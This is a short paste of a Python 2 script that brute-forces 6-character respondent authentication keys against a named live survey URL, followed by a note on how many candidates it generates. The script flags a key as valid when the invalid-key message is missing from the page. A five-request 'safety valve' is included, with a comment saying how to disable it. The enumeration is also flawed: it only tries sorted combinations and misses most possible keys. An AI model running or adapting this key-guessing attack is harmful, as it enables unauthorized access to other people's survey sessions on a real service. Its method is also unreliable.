Python Crawler for Sites.

rlunde, Sep 6th, 2016 (edited)
import urllib2
import itertools

sKey = "The respondent authentication key" # This string appears on every page returned for an invalid key.
mainURL = "https://or.allegiancetech.de/cgi-bin/qwebcorporate.dll?idx=EUFMZ4&l=dansk&rk=" # URL to Lodam GPW.
outList = [] # Output list of functioning keys.


keyElements = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" # Characters a key may contain.
subsets = itertools.combinations_with_replacement(keyElements, 6) # Lazy iterator over 6-character combinations of the elements above.
# WARNING: Yields 4,496,388 combinations (C(41, 6)) to test, proceed with caution.

iterMax = 0 # Test protection: counts the iterations started.

for i in subsets:
    identifier = ''.join(i) # Joins the elements of each subset into one string.

    iterMax = iterMax + 1 # Safety valve: comment out the check below to remove it.
    if iterMax > 5:
        break

    response = urllib2.urlopen(mainURL+identifier) # Call urllib2 and open the webpage.
    html = response.read() # Read the response body.

    if sKey not in html: # Determine whether the sKey string is in the html.
        outList.append(identifier) # If it is not, save the identifier, as it is valid.
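
The size of the iterator built by `itertools.combinations_with_replacement` can be checked without making any requests. The sketch below is an illustration and not part of the original paste: the helper name `count_with_replacement` is hypothetical, and it assumes only the 36-character alphabet and key length of 6 used above. It applies the standard multiset formula C(n + k - 1, k), then cross-checks the formula against a small alphabet that can be enumerated in full.

```python
import itertools
from math import factorial


def count_with_replacement(n, k):
    """Number of size-k multisets drawn from n symbols: C(n + k - 1, k).

    Hypothetical helper for illustration; not part of the original script.
    """
    return factorial(n + k - 1) // (factorial(k) * factorial(n - 1))


alphabet_size = 36  # len("ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890")
key_length = 6

total = count_with_replacement(alphabet_size, key_length)
print(total)

# Cross-check the formula on an alphabet small enough to list completely.
small = list(itertools.combinations_with_replacement("AB1", 2))
print(small)
assert len(small) == count_with_replacement(3, 2)
```

Each tuple is emitted once regardless of element order, which is why the total is a binomial coefficient and not a power of the alphabet size.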